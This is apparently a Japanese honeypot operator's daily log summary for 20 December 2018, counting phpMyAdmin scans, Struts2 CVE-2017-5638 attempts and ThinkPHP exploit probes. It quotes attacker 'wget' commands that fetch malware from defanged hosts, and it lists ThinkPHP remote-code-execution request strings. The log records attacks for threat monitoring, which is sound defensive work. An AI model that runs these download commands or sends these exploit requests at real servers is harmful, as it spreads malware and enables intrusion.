ハニーポットのログ分析(2018/12/20)
WOWhoneypotの2018/12/20(木) (運用197日目)の簡易分析です。
本日の総アクセス件数は 128件です。
本日の主なアクセスは以下です。
・phpMyAdminの調査:42件
→新たなパスに対する調査がありました。
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:20件
・ThinkPHPの脆弱性を突いた攻撃:8件
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。Struts2に対するものです。
5 2018-12-20 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 2018-12-20 wget -c hxxp://154.85.99[.]85:8080/5325
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 50 | 2018-12-20 | アクセス | GET / |
| 20 | 2018-12-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 3 | 2018-12-20 | phpMyAdminの調査 | GET /mysql/admin/index.php?lang=en |
| 2 | 2018-12-20 | phpMyAdminの調査 | GET /pHpMyAdMiN/scripts/setup.php |
| 2 | 2018-12-20 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 2 | 2018-12-20 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 1 | 2018-12-20 | スキャナによる調査 | HEAD /redirect.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | HEAD /phpmyadmin/index.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | HEAD /phpmyadmin/%20index.php |
| 1 | 2018-12-20 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /sqlweb/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /sqladm/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /sqladmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /scripts/setup.php |
| 1 | 2018-12-20 | クローリング | GET /robots.txt |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /p/m/a/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /PHPMYADMIN/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET \phpmyadmin\scripts\setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmy-admin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/db___.init.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/scripts/db___.init.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/scripts/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/libraries/database_interface.lib.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/css/phpmyadmin.css.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/config.user.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/config_inf.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpMyAdmin/config/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/config/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpmyadmin/4.2/installing/ |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /phpLDAPadmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /mysqladmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /my/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 1 | 2018-12-20 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | ThinkPHPの脆弱性を突いた攻撃 | GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /db/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /dbadmin/scripts/setup.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /config/config.inc.php |
| 1 | 2018-12-20 | phpMyAdminの調査 | GET /2phpmyadmin/scripts/setup.php |
以上です。
